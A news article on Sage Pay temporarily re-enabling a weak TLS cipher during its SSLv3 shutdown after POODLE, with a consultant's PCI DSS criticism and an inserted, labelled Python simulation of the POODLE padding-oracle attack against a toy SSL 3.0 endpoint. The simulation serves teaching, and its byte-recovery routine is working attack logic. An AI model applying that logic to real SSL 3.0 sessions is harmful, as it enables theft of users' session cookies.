Online payment service Sage Pay has been fingered for temporarily weakening its transport security while overhauling its site's SSL/TLS configuration.
Security consultant Paul Moore noticed that the Sage Pay website was briefly running a weak cipher last week.
The issue was quickly corrected after Moore went public with his concerns on Tuesday. He nonetheless remains critical, arguing that the cryptographic downgrade took Sage Pay out of compliance with the credit card industry's PCI DSS rules.
In response to queries from El Reg, Sage Pay explained that the temporary downgrade had happened in order to avoid leaving customers with older systems behind in the process of updating systems in response to the recent POODLE vulnerability.
We have been working over the last few months to mitigate the risks of Poodle to our customer base.
In terms of the Poodle vulnerability, we began the disabling of SSLv3 on our live system from Friday 30th January. As this is a batch roll out, this work will be continuing over the next few weeks.
We have been notifying customers of this work via a range of communications about this ranging from emails, blogs [example here], direct mailers and banners in the Sage Pay admin area.
During the work undertaken, the fix which we put in place, a weaker TLS cipher, caused a knock-on effect for several customers, impacting their processing.
We switched the cipher back on as part of a short term fix to mitigate the impact whilst we worked with the affected customers. This was removed this morning [Tuesday] and a permanent solution was put in place.
Moore said Sage Pay's response is not unreasonable, but that it would have done better to inconvenience customers on obsolete systems such as Windows XP than to breach PCI DSS rules.
"That’s mostly accurate," Moore told El Reg. "They disabled the weak cipher which effectively crippled customers using Windows XP/embedded devices, so they switched the weak cipher back on."
"Although I understand the reason behind it, that’s not the point. The fact they accepted payments from those devices proves they knowingly enabled the weak cipher to begin with, despite the impact upon their PCI compliance."
The POODLE (Padding Oracle On Downgraded Legacy Encryption) security flaw was initially thought to affect only the obsolete – but still widely used – Secure Sockets Layer (SSL) 3.0 protocol when it was disclosed in October. Follow-up research revealed that some TLS (Transport Layer Security) implementations were also vulnerable, because they failed to check the CBC padding bytes that the TLS specification requires them to verify.
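To show why the SSL 3.0 weakness described above is exploitable, here is an added simulation of the POODLE padding-oracle attack. It is example code written for this page, not code from the article, from Moore or from Sage Pay. It assumes an 8-byte CBC block (3DES-sized), HMAC-SHA1 as the record MAC, a toy keyed permutation standing in for the block cipher so that the script runs offline with only the standard library (the attack does not depend on cipher strength), a fresh random IV per record instead of SSL 3.0's chained IVs (same per-attempt success probability, simpler to model), and a constructed secret, "Cookie: session=7f3a", as the value the attacker is after. The names ToyBlockCipher, Ssl3Endpoint, poodle_recover and demo are the example's own.

```python
import hashlib
import hmac
import random

BLOCK = 8      # CBC block size in bytes (3DES-sized, as in SSL 3.0 CBC suites)
MAC_LEN = 20   # HMAC-SHA1 tag length

class ToyBlockCipher:
    """Keyed permutation on BLOCK-byte blocks. TOY ONLY; POODLE does not depend on cipher strength."""

    def __init__(self, key):
        rng = random.Random(key)
        self.sbox = rng.sample(range(256), 256)               # key-dependent byte substitution
        self.inv = [self.sbox.index(v) for v in range(256)]
        self.round_keys = [hashlib.sha256(key + bytes([r])).digest()[:BLOCK] for r in range(4)]

    def encrypt_block(self, block):
        x = list(block)
        for rk in self.round_keys:
            x = [self.sbox[c ^ k] for c, k in zip(x, rk)]  # keyed substitution
            for i in range(1, BLOCK):                       # prefix-XOR diffusion
                x[i] ^= x[i - 1]
            x = x[::-1]                                     # byte reversal (self-inverse)
        return bytes(x)

    def decrypt_block(self, block):
        x = list(block)
        for rk in reversed(self.round_keys):                # undo each round step in reverse order
            x = x[::-1]
            for i in range(BLOCK - 1, 0, -1):
                x[i] ^= x[i - 1]
            x = [self.inv[c] ^ k for c, k in zip(x, rk)]
        return bytes(x)

class Ssl3Endpoint:
    """SSL 3.0 CBC record layer: plaintext = msg || MAC || padding; last byte = padding length L, L < BLOCK."""

    def __init__(self, key, mac_key, rng=None):
        self.cipher, self.mac_key, self.queries = ToyBlockCipher(key), mac_key, 0
        self.rng = rng or random.Random(0)   # fresh IV per record: a simplification of SSL 3.0's chained IVs

    def encrypt_record(self, msg):
        body = msg + hmac.new(self.mac_key, msg, hashlib.sha1).digest()
        pad_len = BLOCK - 1 - len(body) % BLOCK   # a block-aligned body gets a full block of padding
        pt = body + bytes(pad_len) + bytes([pad_len])
        iv = prev = bytes(self.rng.getrandbits(8) for _ in range(BLOCK))
        out = [iv]
        for i in range(0, len(pt), BLOCK):
            prev = self.cipher.encrypt_block(bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev)))
            out.append(prev)
        return b"".join(out)

    def accepts(self, record):
        """SSL 3.0 receiver: verifies the padding LENGTH byte and the MAC, never the padding CONTENT."""
        self.queries += 1
        iv, ct = record[:BLOCK], record[BLOCK:]
        pt, prev = b"", iv
        for i in range(0, len(ct), BLOCK):
            blk = ct[i:i + BLOCK]
            pt += bytes(a ^ b for a, b in zip(self.cipher.decrypt_block(blk), prev))
            prev = blk
        pad_len = pt[-1]
        if pad_len >= BLOCK:
            return False
        body = pt[:len(pt) - pad_len - 1]
        return hmac.compare_digest(body[-MAC_LEN:], hmac.new(self.mac_key, body[:-MAC_LEN], hashlib.sha1).digest())

def poodle_recover(secret_len, client_send, oracle, max_tries=20000):
    """client_send(prefix_len, suffix_len) -> record: a victim browser that attacker script makes send
    prefix || secret || suffix. oracle(record) -> bool: the server's accept/reject, visible on the wire."""
    recovered = bytearray()
    for j in range(secret_len):
        prefix_len = (BLOCK - 1 - j) % BLOCK                        # secret[j] ends a block
        suffix_len = -(prefix_len + secret_len + MAC_LEN) % BLOCK   # last block is all padding
        t = (prefix_len + j) // BLOCK + 1                            # +1 because blocks[0] is the IV
        for _ in range(max_tries):
            rec = client_send(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            blocks[-1] = blocks[t]                                   # move the target block to the end
            if oracle(b"".join(blocks)):
                # accepted => D(C_t)[-1] ^ C_{n-1}[-1] == BLOCK-1, and P_t[-1] = C_{t-1}[-1] ^ D(C_t)[-1]
                recovered.append(blocks[t - 1][-1] ^ blocks[-2][-1] ^ (BLOCK - 1))
                break
        else:
            raise RuntimeError("oracle never accepted; block alignment is wrong")
    return bytes(recovered)

def demo(seed=1):
    """Runs the attack on a constructed secret; returns (secret, recovered, oracle queries)."""
    rng = random.Random(seed)
    endpoint = Ssl3Endpoint(bytes(rng.getrandbits(8) for _ in range(16)),
                            bytes(rng.getrandbits(8) for _ in range(16)), rng)
    secret = b"Cookie: session=7f3a"   # constructed sample secret, not real data

    def client_send(prefix_len, suffix_len):
        return endpoint.encrypt_record(b"A" * prefix_len + secret + b"B" * suffix_len)

    recovered = poodle_recover(len(secret), client_send, endpoint.accepts)
    return secret, recovered, endpoint.queries
```

Calling demo() recovers the whole secret with roughly 256 oracle queries per byte. The receiver in accepts() is the whole story: SSL 3.0 only checks that the last byte is a valid padding length and that the MAC over what remains verifies, so an attacker who can make the victim send aligned requests and then swap a chosen ciphertext block into the final position gets one accepted record per 256 attempts, and each acceptance leaks the last byte of that block. TLS 1.0 and later require the padding bytes themselves to be checked, which is why the follow-up POODLE cases against TLS were implementations that skipped that check rather than a flaw in the protocol.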
As previously reported, banks were left scrambling to update, leaving UK banks' website traffic potentially open to eavesdropping. Moore agreed with comments by another security expert, Virus Bulletin editor Martijn Grooten, that it's unlikely anyone would have been able to mount a working POODLE attack against Sage Pay – while reiterating that this doesn't excuse what Sage had done.
"It makes no difference how viable the attack is... it's that it's a clear breach of PCI regulations. Twice," Moore said during a discussion about the issue on Twitter.
Sage Pay is an independent payment service provider that boasts more than 50,000 customers. The business, a subsidiary of accounting software firm Sage, makes it possible for clients to accept payments online or over the phone. ®